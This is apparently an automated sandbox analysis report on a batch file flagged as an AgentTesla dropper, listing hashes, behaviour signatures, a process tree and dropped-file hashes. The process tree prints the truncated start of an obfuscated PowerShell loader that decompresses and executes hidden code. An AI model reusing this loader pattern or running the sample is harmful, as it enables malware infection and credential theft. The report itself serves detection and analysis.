Analysis

  • max time kernel
    959s
  • max time network
    923s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    16-09-2024 00:42

General

  • Target

    message(1).bat

  • Size

    4KB

  • MD5

    e296801aa02e88edcfc6132fbfe05504

  • SHA1

    7bffaaebf505f46a2a5fa352076781e3b70b816b

  • SHA256

    d94d1e06068956048d32860b187a4a5faab782143631660f2d174048f6cae5ae

  • SHA512

    79e27d197a69f40b4e1478dd0020644b7378dcc4455df9f8ad03caf0ebc80e63809b486fd2df57e6978c8fee49bd7192d8b5e4d765803153741d3767c5b04d32

  • SSDEEP

    96:FKBYr6CQ9lrTi8Dsg9jfltpRBTPiQQLNBuZYbzTe/jyDaP3D7uM1I2iJPABY:FJr6CR8wgNlTaLnuqbe/yaP3mM1GPD

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 34 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 44 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\message(1).bat"
    1⤵
      PID:4180
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:2992
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\message(1).bat" "
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2408
        • C:\Windows\system32\cmd.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4924
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2452
      • C:\Windows\System32\NOTEPAD.EXE
        "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\message(1).bat
        1⤵
          PID:220
        • C:\Windows\system32\CMD.eXE
          "C:\Windows\system32\CMD.eXE" /C pOWErShelL " [stRING]::JoIN('',( '73S69b88<32C40:78m69j87j45b79C66:74C101j67S116b32C73e79n46S99S111n109n112m114<69j115S115<105x79C78n46m68e101n70e76x97m116x69b115<84C114n101n97S77e40n32e91S83n89S83n116j101n109b46b105S111C46C109C101:109:79e82C121x
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:4408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            pOWErShelL " [stRING]::JoIN('',( '73S69b88<32C40:78m69j87j45b79C66:74C101j67S116b32C73e79n46S99S111n109n112m114<69j115S115<105x79C78n46m68e101n70e76x97m116x69b115<84C114n101n97S77e40n32e91S83n89S83n116j101n109b46b105S111C46C109C101:109:79e82C121x
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:740
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1200
          • C:\Windows\system32\cmd.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4308
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              3⤵
              • Blocklisted process makes network request
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5032
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:8
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            2⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3596
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c50bb16e-e73b-42b7-b4f3-13d6adc86877} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" gpu
              3⤵
                PID:2728
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ff7c883-69b6-4d55-8990-b34e1b187251} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" socket
                3⤵
                • Checks processor information in registry
                PID:2292
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3156 -childID 1 -isForBrowser -prefsHandle 2964 -prefMapHandle 3216 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87868489-99df-44c7-9461-4e928ad5ec21} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" tab
                3⤵
                  PID:3356
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4228 -childID 2 -isForBrowser -prefsHandle 2600 -prefMapHandle 2588 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2a66d51-755f-4d3d-9942-bf6e6f4eff60} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" tab
                  3⤵
                    PID:2452
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4848 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4868 -prefMapHandle 4864 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20444687-8d0d-4a59-9c36-474942502d14} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" utility
                    3⤵
                    • Checks processor information in registry
                    PID:5372
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5344 -childID 3 -isForBrowser -prefsHandle 5312 -prefMapHandle 5252 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4aaf5be2-67ca-4dab-85a1-faf0ef4836fe} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" tab
                    3⤵
                      PID:5924
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 4 -isForBrowser -prefsHandle 5532 -prefMapHandle 5540 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d4158c0-3e4c-4a89-98f3-62b27e90ae18} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" tab
                      3⤵
                        PID:5972
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5632 -childID 5 -isForBrowser -prefsHandle 5708 -prefMapHandle 5704 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3133a452-a601-481f-9776-ed0b356e766c} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" tab
                        3⤵
                          PID:5992
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5976 -childID 6 -isForBrowser -prefsHandle 5988 -prefMapHandle 5968 -prefsLen 27211 -prefMapSize 244628 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {09c3458f-4da5-46e4-8e10-ea793101345f} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" tab
                          3⤵
                            PID:1756
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe"
                        1⤵
                        • Enumerates system info in registry
                        • Modifies data under HKEY_USERS
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:5812
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc0b8dcc40,0x7ffc0b8dcc4c,0x7ffc0b8dcc58
                          2⤵
                            PID:5720
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1880,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1876 /prefetch:2
                            2⤵
                              PID:6020
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2124 /prefetch:3
                              2⤵
                                PID:5964
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2456 /prefetch:8
                                2⤵
                                  PID:3840
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3176 /prefetch:1
                                  2⤵
                                    PID:1084
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3436 /prefetch:1
                                    2⤵
                                      PID:1728
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3724,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4564 /prefetch:1
                                      2⤵
                                        PID:556
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4772,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4792 /prefetch:8
                                        2⤵
                                          PID:64
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4412,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5024 /prefetch:8
                                          2⤵
                                            PID:220
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5184,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5012 /prefetch:1
                                            2⤵
                                              PID:5368
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4704,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4828 /prefetch:1
                                              2⤵
                                                PID:5432
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4524,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5104 /prefetch:1
                                                2⤵
                                                  PID:5476
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3444,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3264 /prefetch:1
                                                  2⤵
                                                    PID:5164
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4564,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4796 /prefetch:1
                                                    2⤵
                                                      PID:5484
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5188,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4596 /prefetch:8
                                                      2⤵
                                                        PID:5732
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4632,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4604 /prefetch:1
                                                        2⤵
                                                          PID:3572
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5704,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5724 /prefetch:1
                                                          2⤵
                                                            PID:5272
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5140,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5148 /prefetch:8
                                                            2⤵
                                                              PID:5212
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5268,i,461711393787281915,2627972972870855175,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5068 /prefetch:8
                                                              2⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4452
                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                            1⤵
                                                              PID:4968
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                              1⤵
                                                                PID:3540
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe"
                                                                1⤵
                                                                  PID:5360
                                                                  • C:\Users\Admin\Downloads\OceanMinecraft.exe
                                                                    OceanMinecraft.exe F1K9R6W7
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Enumerates connected drives
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Modifies system certificate store
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:5696

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\74af28b7-c4b7-42f4-925b-1268f3c1a4a7.tmp

                                                                  Filesize

                                                                  15KB

                                                                  MD5

                                                                  63c59e094f9c65d8ce710f17d94ac793

                                                                  SHA1

                                                                  ff3bcd16d7c60dd1ed2f666f8521b1b30dc4bce4

                                                                  SHA256

                                                                  8630cb7d6ed2513318913f1e9def638b8d7e4c7e8da765e5f48dcc492cf71ffb

                                                                  SHA512

                                                                  e74ac5346351c75e47aa586239171642ce2d0db598bd4572ad7dd3870c863d1bf15d2e2c91d1e09f266d94690c22fc16ef30d26921531581c3ea03d962dd3e8b

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                  Filesize

                                                                  649B

                                                                  MD5

                                                                  79d64680609cf7855e6cffc6627cc747

                                                                  SHA1

                                                                  4986d88f78fb186306601d4d912328c90911829a

                                                                  SHA256

                                                                  2cda4a5823540aea9366772f28b0e9ec714f680e3f5a2dfbc8c5d54cbaf62241

                                                                  SHA512

                                                                  1f07968b96bc084614ecdaf003b7404f948cc940719186b640dc31872024236ac84283170a54e6aecd12e328d6f7da1763b441e64a226b1ca5bbea67b468625a

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                  Filesize

                                                                  408B

                                                                  MD5

                                                                  ea7f566c57585e8e2b09f4d12a988221

                                                                  SHA1

                                                                  af981f9ac94fe7b04d0d58b822b770641d0ae12e

                                                                  SHA256

                                                                  041cfb14b4a5e1bbc130e80db770c93da11ebe943e17cc2026e456b7e20badd9

                                                                  SHA512

                                                                  4261f9b953c82de0cd001fef3bd8c502773c45e79326f0dbf519e9fc5b987a722504869f7cb5961d20a02e40c85d88ef38aaaf2311d1f69d59478ce310bee5e9

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  d628c7fe93653ba2f5ac7979a43073bf

                                                                  SHA1

                                                                  84adce694003154cfabb4bb8db94a2d35a3466d0

                                                                  SHA256

                                                                  20f3c8613a44802ee228abfb179ad3ccdf74463ab99bc879aff00db28f1b5f87

                                                                  SHA512

                                                                  73cb3b1e3ba70516a29ccd4b131c15f286d1453663bf0cadc22b44204b88a33249e36cfc9ad76cee4b0f6e2a876ff7d534b3abe224d8edafd7a24443513953bd

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  966607e9a89ad03c0ec22c70911aec15

                                                                  SHA1

                                                                  b6aec9021c2c6d240752310e15bd76eb1b7facc6

                                                                  SHA256

                                                                  f945503228edecca2ebe237906cff3dcf6102916f5392eb958bfda6cd299fd5d

                                                                  SHA512

                                                                  18a915a2246b393265948d1f182313a98fb0e2e8722ad1b3ca563280440b02e1a75901ad3527d055f9e6894eb7e299fff9bf9a2baa1468c4887449051b8737e4

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  b8be6ddc3ec344560ae84e47c960fc81

                                                                  SHA1

                                                                  6780ab47820d89957429f47c5aea04537eb44fcd

                                                                  SHA256

                                                                  ed4f566bcc1f2fe2941ff5b15b26317b8f82b84ef409d8ae625ce65adf76caa0

                                                                  SHA512

                                                                  c9707d0bc057d64d4f33950672255bf46755f098cf406c5f15a20f1f1a6532aaa8d03888c9e84c237b120166be1f7a9f58c968d4ece12ea02e990acac74bbaf8

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                  Filesize

                                                                  2B

                                                                  MD5

                                                                  d751713988987e9331980363e24189ce

                                                                  SHA1

                                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                                  SHA256

                                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                  SHA512

                                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                  Filesize

                                                                  356B

                                                                  MD5

                                                                  5431ee727449cb53d59a8f22d4e6f439

                                                                  SHA1

                                                                  c5d8079dad0a1fe5826e72cd5c3509a188e0cdfa

                                                                  SHA256

                                                                  7a5a54201edc4da6ddc62498539e6141885e3f66ddbc0937da8e638d65f64670

                                                                  SHA512

                                                                  1d37959c81530b9c94e32dcb687e15fec803b7b763bbd7446a3efb1489f58b5b5ad43d9c1f1f856c092091a7c924d89cea8a20aa37e9ac498ed10b427138cfdb

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                  Filesize

                                                                  690B

                                                                  MD5

                                                                  c76aa32f5e7f24e209cb43d2b0db2c8d

                                                                  SHA1

                                                                  8ce4186279ef41154388ee5eaa26e3c87255b705

                                                                  SHA256

                                                                  6ab39e46ca7317ecf6affa2f45c342ad6c86c76629f4e39ef9d513e5760b1599

                                                                  SHA512

                                                                  74a776cda0601901b37822fdc17f9486ca378f6685875dda80177f91ae02761792c4d7568ac25f187b74524fdf50ffccfc8ba46cbee35e992d24eeeba03ca5ad

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                  Filesize

                                                                  690B

                                                                  MD5

                                                                  c3e2ce6b85c24c9905b79de461374fc6

                                                                  SHA1

                                                                  cd35cc4e16c09fbdc9a4ae29f8beb9f2305078ba

                                                                  SHA256

                                                                  ebc024cfaa6e0d142c07ef442943ee11e68c987193a1a6bce551b9f727145672

                                                                  SHA512

                                                                  0dd0f08a9eab828422ba7c32f9a2496f1b8c4d5601fe99703440bc0789148acb78c03602e03e190ac374f304cb8431ed07f3a44ee77bde71d253a87c0dcbbbcd

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                  Filesize

                                                                  690B

                                                                  MD5

                                                                  1f835f5cee05c90be05fe51c31402fe1

                                                                  SHA1

                                                                  f3ec3e964ab3a4807cf8750ff9c5465e581f3c26

                                                                  SHA256

                                                                  3dbe0ed020a84a223aaadf0627175273a17266d95067091eece2a54b59f49e57

                                                                  SHA512

                                                                  3e8e6536f238ee7b787febce5867464c6fed8750ba0ff56ed2e3f636d03681a78fa3154a1b2a7064f757ca1068240e25975adb25ca8579d8e95eef5f311d20d4

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  9KB

                                                                  MD5

                                                                  82057016e06d37c8a1d464ebeefc3289

                                                                  SHA1

                                                                  df06546035be724cba307b5acaf906877b8b0808

                                                                  SHA256

                                                                  65281162fd487332e2f9ec6762307a7a217a2c8983e2b191097aaacff1659c3f

                                                                  SHA512

                                                                  46ba8b8c33e7c2c7fbca7162f23b416d8b5f3f737eafacd78032985b4be6c87f484bb306266fac6299685069e546582f13d83c73b61c252e1d0868146454ad3c

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  068c32e623f3cd27a6c401274d4fb46b

                                                                  SHA1

                                                                  4cd1bbbe63af6f856ab4e7f48a0978f30b635d3d

                                                                  SHA256

                                                                  671004ff0b61a90bfe7a90c11ef78a87884fb496acc5ba5f649f25b5b03ae569

                                                                  SHA512

                                                                  8c62561d1ec3fa5a90a31086633b6274046be2875c8ddb65a15eb296e45e6d99aef30f3f86767409e8668a43a390f2e267a5fc9b665ff6dc97b96a6c1da895d0

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  f5e4b5bb7022c94604d0d0128815abb7

                                                                  SHA1

                                                                  c5401ff42772f9d970d00ca0955b910451ae8461

                                                                  SHA256

                                                                  a22e91f8feee8bd91db3ff93fa33395d9e9b50f02940dbb85b7846067d31dd3e

                                                                  SHA512

                                                                  b7cfe935595add6c3a5e21610245ef8cfb626ed48804ff3928fc6befc84d498b18198b22ae28f40fec8088d71343a77e0780c8e773b862957591027f7230c9a0

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  9KB

                                                                  MD5

                                                                  b083349d7bf89d50e074e7052ca1b82d

                                                                  SHA1

                                                                  fb70c7ed01ab457cf9a0e5ad40544af17eab8465

                                                                  SHA256

                                                                  26bd4aaa3969647836772e09f02a26fa43198d28adaa8150465e5a771534a7fa

                                                                  SHA512

                                                                  a51f8455ef703164aecf98204f016457a10dae6590729bb6ed4d63d41a1c2aeca1110220e77d5c5c8b6c3cd319552e9ef7fdedce44fae7592a88027849dff5b1

